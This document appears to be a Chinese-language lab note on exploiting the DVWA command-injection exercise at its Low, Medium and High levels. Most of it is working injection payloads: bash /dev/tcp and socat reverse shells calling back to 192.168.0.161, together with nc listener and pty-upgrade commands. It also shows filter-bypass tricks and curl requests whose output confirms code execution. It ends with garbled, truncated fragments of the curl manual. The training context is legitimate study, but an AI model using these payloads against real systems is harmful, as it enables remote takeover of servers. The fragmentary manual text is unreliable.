AWVS Command Injection
Linux中 && - 前一条命令成功再执行后一条命令
|| - 前一条命令失败再执行后一条命令
请求-例(high)
Low
没有做限制。
8.8.8.8;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
长时间后浏览器会显示超时。
(rlwrap nc -lvnp 9999)
python3 -c “import pty;pty.spawn(‘/bin/bash’)”
如果nc及时退出,浏览器回显:
curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=low;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl" \
-s | grep uid
curl参数说明在底部↓
https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/
Medium
“&&”、";"被替换为空。没有过滤单个的“&”。
在Linux中,&符号表示将命令放到后台执行。
会输出作业编号、进程 ID、作业状态和启动作业的命令
(https://linuxize.com/post/how-to-run-linux-commands-in-background/)
|符号表示将前一个命令的输出作为后一个命令的输入,就是常说的管道符。不论管道前命令的输出如何,管道之后的命令都会尝试运行。
例如
8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
High
有以下过滤,第三个"|"后面多了一个空格,和medium类似,区别是增加了更多的过滤。
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
使用socat 进行远程连接
socat是Linux下的一个多功能的网络工具,名字来由是「Socket CAT」。它的功能与Netcat类似,可以看做是Netcat的加强版。【https://cybr.com/ethical-hacking-archives/create-a-reverse-shell-with-socat-dvwa-os-command-injections/】
socat是一种基于命令行的实用程序,它建立两个双向字节流并在它们之间传输数据。(Manual)
PHP trim() — 去除字符串首尾处的空白字符(或者其他字符)
8.8.8.8|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint
|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint
https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/
curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=high;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl" \
-s | grep uid
<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
Impossible
😦:(
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$target = $_REQUEST[ 'ip' ];
$target = stripslashes( $target );
// Split the IP into 4 octects
$octet = explode( ".", $target );
// Check IF each octet is an integer
if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
else {
// Ops. Let the user name theres a mistake
echo '<pre>ERROR: You have entered an invalid IP.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
curl参数说明(Manual)
-X, --request <method>
-X HEAD will not suffice. You need to use the -I, --head option.
The method string you set with -X, --request will be used for all requests, which if you for example use -L, --location may cause unintended side-effects when curl does not
If -X, --request is provided several times, the last set value will be used.
curl -X "DELETE" https://example.com
curl -X NLST ftp://example.com/
-d, --data <data>
--data-raw is almost the same but does not have a special interpretation of the @ character. To post data purely binary, you should instead use the --data-binary option. To
URL-encode the value of a form field you may use --data-urlencode.
If any of these options is used more than once on the same command line, the data pieces specified will be merged with a separating &-symbol. Thus, using '-d name=daniel -d
named 'foobar' would thus be done with -d, --data @foobar. When -d, --data is told to read from a file like that, carriage returns and newlines will be stripped out. If you
do not want the @ character to have a special interpretation use --data-raw instead.
-d, --data can be used several times in a command line
curl -d "name=curl" https://example.com
curl -d "name=curl" -d "tool=cmdline" https://example.com
curl -d @filename https://example.com
See also --data-binary, --data-urlencode and --data-raw. This option is mutually exclusive to -F, --form and -I, --head and -T, --upload-file.
-H, --header <header/@file>
without knowing perfectly well what you are doing. Remove an internal header by giving a replacement without content on the right side of the colon, as in: -H "Host:". If
you send the custom header with no-value then its header must be terminated with a semicolon, such as -H "X-Custom-Header;" to send "X-Custom-Header:".
-H, --header can be used several times in a command line
curl -H "X-First-Name: Joe" https://example.com
curl -H "User-Agent: yes-please/2000" https://example.com
curl -H "Host:" https://example.com
curl -H @headers.txt https://example.com
HTTP/0.9 is a completely headerless response and therefore you can also connect with this to non-HTTP servers and still get a response since curl will simply transparently
The headers this option sets can be overridden with -H, --header as usual.
(HTTP) Extra header to include in the request when sending HTTP to a proxy. You may specify any number of extra headers. This is the equivalent option to -H, --header but
(HTTP) Sends the "Referrer Page" information to the HTTP server. This can also be set with the -H, --header flag of course. When used with -L, --location you can append
See also -A, --user-agent and -H, --header.
with the -H, --header or the --proxy-header options.
See also -H, --header and --proxy-header.
-s, --silent
Use -S, --show-error in addition to this option to disable progress meter but still show error messages.
Providing -s, --silent multiple times has no extra effect. Disable it again with --no-silent.
curl -s https://example.com
See also -v, --verbose, --stderr and --no-progress-meter.